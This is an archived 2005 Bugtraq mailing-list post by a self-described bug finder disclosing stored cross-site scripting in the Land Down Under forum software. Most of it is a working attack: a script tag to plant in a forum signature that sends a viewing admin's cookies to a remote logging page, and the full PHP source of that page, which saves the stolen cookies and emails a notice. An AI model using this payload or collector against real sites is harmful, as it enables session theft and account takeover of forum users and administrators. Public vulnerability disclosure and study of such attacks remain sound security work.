Land Down Under

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Land Down Under
From: bendeniz_avci@xxxxxxxxxxx
Date: 28 Aug 2005 07:55:34 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Bug finder:spyMASter
Web site:Realhackers.net
Contact:bendeniz_avci@xxxxxxxxxxx

LDU has some xss vulns 
Firstly you can use html codes in your signature you can get cookies with this
put your signature that code

<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. 
cookie)</SCRIPT>

and post a topic to forum when admin look this  topic she/he redirect and you 
can get cookie

this is codes of ekle.php you can save cookie to a  with this php code


<?php
$kayit = fopen("spymaster.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("bendeniz_avci@xxxxxxxxxxx","your cookie 
ready","http://www.realhackers.net/spyoku.txt";,'From: 
spymaster@xxxxxxxxxxxxxxx');
?>

Prev by Date: PHP-Fusion <= v6.00.107 XSS exploit
Next by Date: Secunia Research: SqWebMail HTML Emails Script Insertion Vulnerability
Previous by thread: PHP-Fusion <= v6.00.107 XSS exploit
Next by thread: Secunia Research: SqWebMail HTML Emails Script Insertion Vulnerability
Index(es):
- Date
- Thread